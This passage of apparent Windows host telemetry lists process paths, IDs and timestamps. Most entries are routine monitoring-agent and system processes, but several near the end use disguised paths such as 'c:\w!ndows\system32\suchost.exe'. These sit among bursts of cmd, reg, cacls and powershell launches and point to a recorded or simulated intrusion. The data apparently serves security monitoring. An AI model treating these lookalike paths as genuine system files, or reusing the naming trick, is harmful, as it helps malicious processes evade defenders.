23:13:35.410000\",\"c:\\\\windows\\\\system32\\\\dllhost.exe|0x1da8|2019-02-09 23:26:47.703000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x22c8|2019-02-09 23:35:53.160000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1558|2019-02-10 00:14:15.737000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xa24|2019-02-10 00:14:24.700000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x460|2019-02-10 00:35:53.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe|0xe24|2019-02-10 00:45:27.780000\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe|0x8f0|2019-02-10 00:45:28.780000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x934|2019-02-10 00:45:28.793000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe|0x1158|2019-02-10 00:45:30.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1874|2019-02-10 00:45:30.293000\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\cvtres.exe|0x12cc|2019-02-10 00:45:30.457000\",\"c:\\\\windows\\\\system32\\\\lodctr.exe|0x20b4|2019-02-10 00:45:30.290000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1634|2019-02-10 00:45:30.373000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x22c0|2019-02-10 00:45:30.653000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xef4|2019-02-10 00:45:30.693000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1af0|2019-02-10 00:45:30.720000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1e80|2019-02-10 00:45:30.760000\",\"c:\\\\windows\\\\system32\\\\werfault.exe|0xf54|2019-02-10 00:45:30.803000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x644|2019-02-10 00:45:36.180000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xdd0|2019-02-10 00:45:36.187000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1290|2019-02-10 00:45:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x12f0|2019-02-10 00:45:36.297000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x2274|2019-02-10 00:45:38.023000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x84c|2019-02-10 00:45:38.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x91c|2019-02-10 00:46:28.000000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1058|2019-02-10 00:46:28.010000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf10|2019-02-10 00:48:32.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1398|2019-02-10 00:48:32.810000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe|0x1a00|2019-02-10 00:57:36.083000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xc1c|2019-02-10 00:57:36.103000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe|0xe10|2019-02-10 00:57:36.167000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f3c|2019-02-10 00:57:36.213000\",\"c:\\\\windows\\\\system32\\\\secedit.exe|0xd44|2019-02-10 00:59:27.207000\",\"c:\\\\windows\\\\system32\\\\secedit.exe|0x1290|2019-02-10 00:59:29.590000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x12f8|2019-02-10 01:15:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1050|2019-02-10 01:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe|0xbd8|2019-02-10 01:30:36.103000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x19f4|2019-02-10 01:30:36.127000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xf60|2019-02-10 01:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1af0|2019-02-10 01:45:36.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x8c4|2019-02-10 01:48:32.220000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1004|2019-02-10 01:48:32.230000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xb10|2019-02-10 02:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x4d0|2019-02-10 02:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x17e0|2019-02-10 02:25:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x8ac|2019-02-10 02:25:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15b8|2019-02-10 02:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xa28|2019-02-10 02:45:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xec0|2019-02-10 02:48:32.223000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1bc0|2019-02-10 02:48:32.233000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xdd0|2019-02-10 03:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f60|2019-02-10 03:15:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x22dc|2019-02-10 03:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1b64|2019-02-10 03:15:36.320000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x838|2019-02-10 03:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1590|2019-02-10 03:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xe2c|2019-02-10 03:48:32.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1468|2019-02-10 03:48:32.253000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x16e0|2019-02-10 04:05:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xf3c|2019-02-10 04:05:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1c84|2019-02-10 04:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x195c|2019-02-10 04:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1b64|2019-02-10 04:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1b38|2019-02-10 04:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x690|2019-02-10 04:48:32.243000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xd5c|2019-02-10 04:48:32.250000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1c20|2019-02-10 04:55:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x964|2019-02-10 04:55:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1280|2019-02-10 05:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x23b8|2019-02-10 05:15:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x650|2019-02-10 05:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11ec|2019-02-10 05:45:36.283000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1584|2019-02-10 05:45:36.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x838|2019-02-10 05:45:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x490|2019-02-10 05:48:32.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x864|2019-02-10 05:48:32.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xfc0|2019-02-10 06:15:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x203c|2019-02-10 06:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xa14|2019-02-10 06:35:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x21cc|2019-02-10 06:35:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1ce4|2019-02-10 06:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1bd0|2019-02-10 06:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xcc8|2019-02-10 06:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1570|2019-02-10 06:48:32.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x8f8|2019-02-10 07:15:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x19ac|2019-02-10 07:15:36.300000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1614|2019-02-10 07:25:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x118c|2019-02-10 07:25:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1850|2019-02-10 07:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xcc8|2019-02-10 07:45:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x1610|2019-02-10 07:48:32.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xde4|2019-02-10 07:48:32.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1080|2019-02-10 08:15:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1178|2019-02-10 08:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1248|2019-02-10 08:15:36.277000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x770|2019-02-10 08:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1044|2019-02-10 08:45:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x202c|2019-02-10 08:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf08|2019-02-10 08:48:32.283000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x94c|2019-02-10 08:48:32.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xa78|2019-02-10 09:05:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x11d8|2019-02-10 09:05:36.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xd74|2019-02-10 09:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xd04|2019-02-10 09:15:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x23d8|2019-02-10 09:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x8ac|2019-02-10 09:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x3f8|2019-02-10 09:48:32.293000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f38|2019-02-10 09:48:32.303000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x23b8|2019-02-10 09:55:36.287000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x15e4|2019-02-10 09:55:36.297000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1548|2019-02-10 10:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x128c|2019-02-10 10:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x10a8|2019-02-10 10:45:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x964|2019-02-10 10:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x5a8|2019-02-10 10:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1898|2019-02-10 10:45:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xf88|2019-02-10 10:48:32.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xe08|2019-02-10 10:48:32.317000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x18b8|2019-02-10 11:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1454|2019-02-10 11:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x16e8|2019-02-10 11:35:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1184|2019-02-10 11:35:36.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1d04|2019-02-10 11:45:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xe30|2019-02-10 11:45:36.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0xda8|2019-02-10 11:48:32.317000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1fa8|2019-02-10 11:48:32.323000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1f20|2019-02-10 12:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xfc4|2019-02-10 12:15:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xe3c|2019-02-10 12:25:36.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x604|2019-02-10 12:25:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fa4|2019-02-10 12:45:36.267000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xf94|2019-02-10 12:45:36.377000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x220c|2019-02-10 12:48:32.333000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x2288|2019-02-10 12:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x650|2019-02-10 13:15:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xae4|2019-02-10 13:15:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x1570|2019-02-10 13:15:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x16c0|2019-02-10 13:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0xf60|2019-02-10 13:45:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x134c|2019-02-10 13:45:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x154c|2019-02-10 13:48:32.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1238|2019-02-10 13:48:32.333000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0xc60|2019-02-10 14:05:36.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x13c0|2019-02-10 14:05:36.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x638|2019-02-10 14:15:36.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x115c|2019-02-10 14:15:36.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x15fc|2019-02-10 14:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x16a8|2019-02-10 14:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe|0x1d38|2019-02-10 14:48:32.337000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x684|2019-02-10 14:48:32.347000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x17b0|2019-02-10 14:55:36.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1330|2019-02-10 14:55:36.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x17d0|2019-02-10 15:15:36.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1ff8|2019-02-10 15:15:36.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe|0x1fd0|2019-02-10 15:45:36.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xf80|2019-02-10 15:45:36.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe|0x2120|2019-02-10 15:45:36.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x239c|2019-02-10 15:45:36.270000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1570|2019-02-10 00:45:28.263000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1600|2019-02-10 00:45:28.490000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe|0x17f0|2019-02-10 00:45:29.077000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe|0x11ec|2019-02-10 00:45:30.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe|0xa98|2019-02-10 00:45:31.260000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x628|2019-02-10 00:45:32.330000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\momperfsnapshothelper.exe|0x1d40|2019-02-10 00:45:33.173000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xbe4|2019-02-10 01:15:13.177000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1640|2019-02-10 02:16:01.743000\",\"c:\\\\windows\\\\system32\\\\installagent.exe|0x16e0|2019-02-10 02:37:21.880000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x13a8|2019-02-10 03:16:50.323000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x7f8|2019-02-10 04:17:37.760000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x16bc|2019-02-10 05:18:26.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1b74|2019-02-10 06:19:15.563000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1094|2019-02-10 08:20:53.907000\",\"c:\\\\windows\\\\system32\\\\installagent.exe|0xb4|2019-02-10 09:07:02.893000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x5a8|2019-02-10 09:21:42.453000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xc4c|2019-02-09 20:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x2064|2019-02-09 22:12:25.910000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1f20|2019-02-09 22:12:36.240000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0xefc|2019-02-10 10:22:30.507000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x19ac|2019-02-10 11:23:18.607000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1004|2019-02-10 12:24:07.077000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x212c|2019-02-09 22:35:53.157000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x1208|2019-02-10 13:24:54.533000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x3f8|2019-02-10 14:25:43.080000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiprvse.exe|0x2178|2019-02-10 15:26:31.813000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x798|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x14ec|2019-02-09 20:05:31.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x48c|2019-02-09 20:05:31.020000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1684|2019-02-09 23:26:47.730000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x490|2019-02-09 23:26:47.740000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1360|2019-02-09 23:26:47.923000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe50|2019-02-09 23:26:47.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1748|2019-02-09 23:26:47.950000\",\"c:\\\\w!ndows\\\\system32\\\\suchost.exe|0x1584|2019-02-09 23:26:48.073000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe|0x12bc|2019-02-09 23:26:48.093000\",\"c:\\\\w!ndows\\\\system32\\\\powershell.exe|0x1260|2019-02-09 23:26:48.107000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2348|2019-02-09 23:26:48.120000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x1488|2019-02-09 23:28:02.250000\",\"c:\\\\windows\\\\system32\\\\speech_onecore\\\\common\\\\speechmodeldownload.exe|0x1e3c|2019-02-10 00:00:00.770000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe|0x1928|2019-02-10 00:00:00.800000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x9ac|2019-02-10 00:28:02.250000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe|0x2378|2019-02-09 21:28:02.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x4b8|2019-02-10 00:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1ca4|2019-02-10 00:44:47.433000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1a44|2019-02-10 00:44:47.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1984|2019-02-10 00:44:47.463000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1004|2019-02-10 00:44:54.540000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0x1940|2019-02-10 00:44:54.557000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x854|2019-02-10 00:45:10.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe|0xd6c|2019-02-10 00:45:10.730000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd74|2019-02-10 00:45:10.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\reg.exe|0x1248|2019-02-10 00:45:11.300000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x2228|2019-02-10 00:45:11.340000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1348|2019-02-10 00:45:11.390000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x1f60|2019-02-10 00:45:11.440000\",\"c:\\\\windows\\\\system32\\\\cacls.exe|0x17b0|2019-02-10 00:45:11.490000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x518|2019-02-10 00:45:11.540000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0x494|2019-02-10 00:45:11.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe|0x1584|2019-02-10 00:45:11.640000\",\"c:\\\\windows\\\\system32\\\\cscript.exe|0x8c0|2019-02-10 00:45:11.690000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe|0xde4|2019-02-10 00:45:11.763000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x2368|2019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x21f8|2019-02-10 